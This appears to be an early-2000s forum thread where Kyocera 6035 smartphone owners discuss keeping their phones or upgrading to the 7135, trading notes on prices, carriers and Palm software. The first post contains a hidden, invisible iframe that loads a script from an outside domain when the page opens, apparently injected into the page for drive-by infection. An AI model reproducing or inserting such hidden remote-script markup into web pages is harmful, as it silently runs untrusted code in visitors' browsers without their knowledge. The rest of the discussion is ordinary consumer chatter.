How many 6035 users still here?

Just wondering, now that Big Brother is out is the venerable 6035 relagated to the bottom drawer?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    still love my 6035

My 6035 still does what I need it to do. The 7135 would be nice but I just can’t see spending almost 1000 in two years for cell phones. I am hoping to get another 8 months to a year out of it.
Before this phone I did switch phones like once every few months (the typical phone lasted 5 months, and by far this is the phone I have owned the longest. It is like a trusty dog, always there and I just cant see giving it up. When the 7135 comes down a bit in price I will get it, but until then nope

kniteman dont you mean since its "little brother", big brother would imply its older and or larger.

I got my 6035 for free after rebate, so I'm not about to shell out $600+ for the 7135, especially considering it's not available in my area. I could get it off Ebay but there's no guarantee that my local carriers would support it. Is there?

That's one reason, IMO, that the 7135 isn't more popular...they aren't promoting it enough. Why the hell not, that's what I want to know.

I still have and use my trusty 6035, I put it up any day against my buddies i330 and I always win, aside from the color screen. I am waiting till I can either get the 7135 in replacement for my 6035 through the insurance, after all the refurb 6035's are gone or at least till a year from now. My 6035 is 2 years old but its only been recently re-activated. I want to see what kind of price the 7135 will have on it in a year..........

    6035

I am a proud owner and heavy user of my 6035. I will not bore you all with reasons for not getting the 7135, yet. I have posted in several threads, my reasons.

Anyway, my only negitive comment regarding the 6035 is it's size. I am somewhat active, and the size is often an issue... after I get back from my Honeymoon in May I'll most likely find the money to upgrade from 6035 to 7135.

    Cheers!

I have been a 7135 owner since February, and used the Treo 300 for 5 months prior. Before that I had used my 6035 since the first day it was available on Sprint. Unfortunately I was stupid enough to give it to someone else, but hopefully when they get tired of it I'll get it back so I can add it to my smartphone museum (along with my like-new pdQ!).

I always have fond memories of my 6035

Got bought my 7135 yesterday, used. I'm keeping the 6035 around as a backup phone. I didn't realize how hard it is to look at without color, but still a very trusty device.

I'm not about to shell out $500 for something that will be $200 in two years. My 6035 does what I need, and I can wait. Patiently. Yup. Sure Can.

Still using my 6035, but I did change my banner to say "7135 In Training".
Maybe that'll come true someday, but I think I want to play with a live 7135 before shelling out the $$ for direct fullfilment. My VZ store says they'll have a demo model within a few Weeks!!

I agree with the statement that I want to play with a live one before I shell out that much money, cause I don't have any money. The 6035 has been the only phone that I've kept longer than a few months. I've owned at least 30 phones with every carrier and the 6035 is the only constant. I just wish I had the money for the 7135 cause it sure is pretty......

Desperately wanting the 7135, but I think that a new PC is going to take precedence right now. I'd be quicker to jump if Sprint had it, but as it stands right now, I probably won't switch until my 6035 gets more broken than it is right now.

I activated a Family share plan to get the 7135 at a reduced price. I'm going all wireless and I'll use the 6035 as a "Home phone" that I can give to anybody. Its $20 for an extra wirelss line vs $35 for a home phone that can only go as far as my phone cord will let it. I've become used to using a headset when talking and its a PITA to hold the home phone to my ear all the time. Plus, with the 6035's battery life I dont have to worry about it after a long phone call or two.

My 6035 goes to a friend this weekend. As soon as the price comes down (it's called skimming the cream, in marketing speak), I'll be getting at least two more 7135's for the wife and kid.

I've been skimmed, and I'm not sorry. This phone really (literally rocks!

The 6035 was great, too, but it's old now. I'd guess that one phone year is equal to about 35 human years.

    Tried & True

Said before on other threads, but can't see shelling out for color, +8MB and MP3 capability when I haven't yet maxed the potential for the 6035. When they add a camera to it and imbed GPS mapping software, I'll bite.

I have 2 6035s and my wife and I use them very much. In fact, they are our primary phones as we have been wireless since 1999. They are still wonderful and very useful tools. I work for the federal govt and I travel a lot and would be lost with it. I will buy one 7135 and have service through Verizon because Sprint has such a beautiful relationship with Samsung.

I have many of my friends and colleagues in line to buy one of my 6035s but they will be waiting a very long time because I intend to keep them. One has OS 3.5.3 and the other has 3.5.1 and even with the slight differences, they are still great. Mine is mainly used for govt and union president work. My wife's OS is actually in Indonesian and she loves it.

I am careful with the third party software so that I avoid crashes. Some of my software is Agendus, Silverscreen, Adobe Reader, Reset Emulator, AIM, Filez, Megawiki, X-Master, ExpenseSumDA, Report, Easy Launch, Fast Cap Hack, T-Mail, Cryptopad, Megamemo, Directory Assistant, Metro, Font Bucket, Avantgo and a few other pqas.

We have the keyboards and use them daily. The 7135 will be welcomed very soon. I can really use it. One thing I did notice about the 7135: inconsistencies on the price. From Verizon it is $699 w/2 yr plan and it won't be available until April 28. I would like to buy one from another source. Any one know where I can get one (just the phone) a bit more reasonable? If not, I will get it through Verizon.

In Illinois, I haven't had much luck finding it yet in the office supply and other phone sources. I purchased my 6035s from Staples for $179.00 in 2001. All in all, I will continue to use the 6035s alongside the new one.
